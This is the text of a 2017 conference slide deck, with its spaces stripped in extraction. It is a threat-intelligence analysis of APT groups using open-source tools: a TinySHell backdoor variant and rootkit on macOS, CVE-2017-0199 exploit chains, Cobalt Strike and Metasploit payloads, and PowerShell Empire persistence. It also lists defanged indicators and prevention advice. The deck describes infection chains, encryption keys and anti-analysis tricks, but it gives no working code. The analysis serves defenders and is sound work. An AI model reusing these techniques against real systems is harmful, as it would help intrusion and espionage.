open source as fuel of recent apt - hitcon.org · n recent apt attacks are heavily using open...
TRANSCRIPT
Dec 2017
Copyright©LACCo.,Ltd.AllRightsReserved.
Yoshihiro Ishikawa
OpenSourceasfuelofrecentAPT
Copyright©LACCo.,Ltd.AllRightsReserved.
Whoami?
• Organization:LAC• Department:CyberCounterThreatTeam• JobTitle:SecurityResearcher
CISSPyoshihiro.ishikawa[at]lac.co.jp
YoshihiroIshikawa
2
Copyright©LACCo.,Ltd.AllRightsReserved.
Agenda
n Purposen OpenSourceMalwareTargetingMacOSn PowerShellEmpireimproperlyusedn Preventionmethodn Conclusion
3
Copyright©LACCo.,Ltd.AllRightsReserved.
Purpose
PowerSploit
TinySHell
n Recently,therearesomanyAPTattacksfueledbytheusageoftheopensourcetoolsandmalware.
n Why?n Actorsperformingattacksusingopensourcetools
arebecomingmoreeasyandmoreresourceful.n Actorsare likelyanonymizetheirattacks.n Actorsusuallymodifiedtheirattackcodeand
createdanewcustomizedmalwareeasily.
Koadic
QuasarRAT
mimikatz
TrochilusPupy
4
Nishang
Copyright©LACCo.,Ltd.AllRightsReserved.
Purpose:APTgroupswithOpenSourceToolsn APT10(menuPass):PowerSploit,Koadic,QuasarRAT,Redleaves(Trochilus)
n Public,Technology,Energysectors,etc(USA,Canada,UK,France,SouthKorea,Japan,etc)[1]
n CloudyOmega(BlueTermite):mimikatzn Somecompanies,nospecifictrends(Japan)
n Tick(BRONZEBUTLER):mimikatzn CriticalInfrastructureandmanufacture(SouthKoreaandJapan)
n PassCV/BARIUM(Winnti?)[2][3]:Metasploit,BeFFn Gamemakers(USA,China,Russia,SouthKorea,TaiwanandJapan)
n UnsureGroup(APT10):PowerShellEmpiren Politicalandacademicsectors(Japan)
Inthispresentation,IwillintroducePassCVandUnsureGroup’sTTPsconfirmedinJapanin2017
5
CYBER - EDUCATION - PENTEST - JSOC - 119 - CONSULTING
We provide IT total solutions based on advanced security technologies.
Copyright©LACCo.,Ltd.AllRightsReserved.
Open Source Malware Targeting MacOS
Copyright©LACCo.,Ltd.AllRightsReserved.
OpensourcemalwarevariantusingTinySHelln Identification(Ipickedonlyonecase)
n Hash:0161317c5f4fb3901df63c6e88f60933n Type:Mach-O64-bitExecutablen Lang:Cn Characteristic:
n DevelopedwithXcodeonMacOSXSierra(10.12)n TinySHelloriginalsourcecodewasusedn Nocodesigning
Fileinformation
CharacteristicString
7
Copyright©LACCo.,Ltd.AllRightsReserved.
WhataboutTinySHell
TinySHellisanopensourcebackdoorthatcompilesonallPOSIXvariants[4][5]
n Functionsn RemoteShellExecutionn FileUploadn FileDownload
n C2Communicationn Protocol:TCPn Port:22(default)n Encryption:AES
n Defaultkeyis"neversayneversaydie"
Copyright©LACCo.,Ltd.AllRightsReserved.
Comparisonofsimilarities
tocallAESencryption
TinySHell MaliciousvariantusingTinySHell
WecanconfirmthatthesecodesareALMOSTidentical.
AESKey=“free&2015”
tocallbackdoorfunctions
9
Copyright©LACCo.,Ltd.AllRightsReserved.
FunctionsonlyinTinySHellvariants1.Themalwareconfiguration/settingfile
Caseroot(Privilegeuser)
n Forsettinginformationusedbymalware,itwassavedasa“.cache”file.This“.cache”fileisreadfromdifferentPATHaccordingtoauthority.
n C2informationwritteninthe".cache"fileisencryptedandmalwaredecryptsthestringusingtheXORdecoderfunctiondescribedinpart"2.Decryptionfunction".
10
.cachefileloadingfunction
Caseroot(Privilegeuser)
Caseuser
C2DomainPortSleepTime
ForgedProcess
.cachefile
Copyright©LACCo.,Ltd.AllRightsReserved.
2.DecryptionFunctionXORdecryptthecontentsof.cacheorhard-codedstringsinmalware.
OurDecryptingScriptinpython
DecryptedString
FunctionsonlyinTinySHellvariants
11
Copyright©LACCo.,Ltd.AllRightsReserved.
3.Anti-analysisfunctionandmaliciousenvironmentsetupn Afunctiontocheckwhether“tcpdump”isrunningonthecomputer.n ShellandMySQLcommandwithouthistoryenabledsetting.
FunctionsonlyinTinySHellvariants
12
Copyright©LACCo.,Ltd.AllRightsReserved.
4.Createrootkitandbecalledfromit
n Arootkit(“rsakit”)iscreatedafterconnectedtoC2serverandreceivingresponse.n Thisrootkitisalsousinganopensourcetoolvariantofrtkitcode.[6]
n Rootkitfunctionality:tohideownprocessorarbitraryprocess.
rootkit(rsakit)
variantTinySHell
FunctionsonlyinTinySHellvariantsinLinux
13
Copyright©LACCo.,Ltd.AllRightsReserved.
MalwareconnectionandrelatedelementsIPaddressassociatedwiththeC2serverdomainofmalwareis“61.78.62[.]21”
ThisIPwasused“war[.]geekgalaxy[.]com”
Thisdomainrelated“PassCV”[7]
NextattentiontootherIPaddress“106.184.5[.]252”[8]
iisexit[at]gmail.com61.78.62.xxx106.184.5.xxx
job[.]yoyakuweb[.]technologyresume[.]immigrantlol[.]com
Relatedelement
14
Copyright©LACCo.,Ltd.AllRightsReserved.
Howusedforattacking
job[.]yoyakuweb[.]technology
User-AgentCheck
resume[.]immigrantlol[.]com
info.zip Resume.app
BeefC2
CaseMac
info.zip Info.doc
CaseWindows
appaffect[.]com
CobaltStrike[10]
vps2java[.]securitytactics[.]com
MetasploitFramework[9]
xxxx.zip Info.chm/Stefan_Info.doc……exe
OtherC2
Beginningisspearphishinge-mail
15
Copyright©LACCo.,Ltd.AllRightsReserved.
CaseWindows:usingCVE-2017-0199exploit
CVE-2017-0199exploit
decoyfileoftheresumeisopened,andmaliciousscriptdownload
Base64+gzip
NextPayloaddownload
16
Copyright©LACCo.,Ltd.AllRightsReserved.
Thiscodeisusingexec-sc.ps1ofDon'tKillMyCat(DKMC)[11]
(toolong,redacted)
Base64
ThiscodeisMetasploitshellcode
ThiscombinationusedattackCobaltStrikecalled"Beacon"
DecodedScript
CaseWindows:usingCVE-2017-0199exploit
17
Copyright©LACCo.,Ltd.AllRightsReserved.
CaseWindows:othersattackingtypes
Downloadnextdownloader
Casechm(in2014)
Caseexe(in2016)
.chmfilecontaininmaliciousscript
extract execute
drop&execute
CobaltStrikeBeaconPayloadexecute
decoyfileisopenedandexefileexecute18
Copyright©LACCo.,Ltd.AllRightsReserved.
CaseMac:usingmaliciousjarfileInfo.zip Info.plist
JavaAppLauncher
ApplicationBundle
Functions:ReadandexecutebundledResume.jarThisapplicationisnotmalicious.ItwassimilartoAppBundlercode.[12]
codesign
19
Copyright©LACCo.,Ltd.AllRightsReserved.
config
decompile
decoyfile
Resume.jar
readconfig(Flash.dat)andconnecttoC2
saveanddisplaydecoyfile
CaseMac:usingmaliciousjarfile
20
Copyright©LACCo.,Ltd.AllRightsReserved.
Flash.dat(config)
C2DomainFlag
PortSleepTime
Thisfilecontentencrypt10-bytesXORkey
vps2java[.]securitytactics.com
ThispacketisusingMeterpreter.ItseemsthatMetasploitFrameworkwasrunningontheC2server.
CaseMac:usingmaliciousjarfile
21
Copyright©LACCo.,Ltd.AllRightsReserved.
Attackisongoing?
ThisIPisPassCVInfrastructures
Isnewspearphishinge-mailattacklaunching?
“eggagent[.]info”used“106.184.5[.]252”andnowused“139.162.95[.]39”ItmightbenewattackInfrastructure
(PassiveTotal)[13]
(DomainTools)[14]22
Aresumeisdisplayedwhenaccessingthedomain
CYBER - EDUCATION - PENTEST - JSOC - 119 - CONSULTING
We provide IT total solutions based on advanced security technologies.
Copyright©LACCo.,Ltd.AllRightsReserved.
PowerShell Empire improperly used
Copyright©LACCo.,Ltd.AllRightsReserved.
WhataboutPowerShellEmpirePowerShellEmpire[15]
RunningPowerShellEmpire
24
PowerShellEmpireisapost-exploitationframeworkanditismainlyusinginapenetrationtestandRedTeamAssessment.
Copyright©LACCo.,Ltd.AllRightsReserved.
PowerShellEmpire:InfectionvectorSpecificUniversityOrganization
ThecontentsoftheZipfilearesuspiciousLNKfilesandRTFfiles
spearphishinge-mail accesstoURLandZipFileDownload
Zipfile
specifiedaccounthasbeenhackd
[16]25
Copyright©LACCo.,Ltd.AllRightsReserved.
LNK/RTFfiledetailof1stpayloadLNK
RTF
CallPowerShellusingScriptintheHTAfile
Thiscommunicationis443/TCPbut,HTTPisusedinsteadofHTTPS
RTFfilewithCVE-2017-0199exploit
LNKfilewillexecuteMSHTA.exe
26
Copyright©LACCo.,Ltd.AllRightsReserved.
HTAfiledetailof2ndpayload(caseofLNK)
ThiscodeisPowerShellEmpire
Base64
Responsedata(HTAfile)
DisplayDecoyWebPages
27
Copyright©LACCo.,Ltd.AllRightsReserved.
PersistencemethodswithPowerShellEmpire
ThisstringBase64decodedresultisEmpirescript
Taskscheduler
Pleasecheckthe“debug”registryvalue
TaskProgramtolunchPowerShell
28
Copyright©LACCo.,Ltd.AllRightsReserved.
Malwareconnectionandrelatedelements
BothcompaniesprovideWebHostingservice
Wecansee“HTTP/1.0”and“Microsoft-IIS/7.5”intheHTTPresponseheader
ThiscombinationusedEmpireC2Server(listeners/http.py).ItwasrunningasofcheckedonlateAugust2017.
27
Copyright©LACCo.,Ltd.AllRightsReserved.
Preventionmethodn PlentyofinitialattackvectorsareSpearPhishingE-mail.
n Keepup-to-datewithlatestsystems,softwareandusedsecurityproductsn Educateemployeesonpotentialsecuritythreats¬openingunknownemail
n Haveaspecialcareforrecentexploitvectors(DDE,XLLAdd-Ins,etc)whicharehavingverypotentialusagetobeusedinattack.n DisablingDDE,XLLAdd-InswithMicrosoftOfficesettingsetc.[17]
n PowerShell,HTA,CHMareoftenusedinthisseriesorsimilarthreats.n BlockingPowerShell,HTAandCHMwithAppLockerorSRPetc[18][19]
n Repeatedlyusesimilarattackmethodsandusealmostsameinfrastructure.n UtilizeThreatIntelligencetools
30
Copyright©LACCo.,Ltd.AllRightsReserved.
Conclusion
n RecentAPTattacksareheavilyusingopensourcetoolandhastheincreasingtendensiontomodifytheoriginalsourcecode,sothattheycancorrespondtovariousplatforms.
n Thepastevidenceshowsusthattheattacksarecontinuingandstillongoingtoonow.
n FortheinformationsharingwithOPSEConaglobalscale,youaremorethanwelcometocontactus!
31
CYBER - EDUCATION - PENTEST - JSOC - 119 - CONSULTING
We provide IT total solutions based on advanced security technologies.
Copyright©LACCo.,Ltd.AllRightsReserved.
Thank you. Any Questions ?
Copyright©LACCo.,Ltd.AllRightsReserved.
1. https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf2. https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies3. https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-
windows-defender-atp/4. https://packetstormsecurity.com/files/31650/tsh-0.6.tgz.html5. https://github.com/creaktive/tsh6. https://github.com/ivyl/rootkit7. https://www.bluecoat.com/zh-cn/security-blog/2014-07-21/korean-gaming-industry-still-under-fire8. https://www.protectwise.com/post/winnti-evolution-going-open-source/9. https://www.metasploit.com/10. https://www.cobaltstrike.com/11. https://github.com/Mr-Un1k0d3r/DKMC12. https://bitbucket.org/infinitekind/appbundler13. https://community.riskiq.com/14. https://www.domaintools.com/15. https://www.powershellempire.com/16. https://www.jcer.or.jp/center/f.relationship_jp-us.html17. https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/18. https://www.iij.ad.jp/en/company/development/iir/pdf/iir_vol32_infra_EN.pdf19. https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-
attacks-16-en.pdf
Reference
33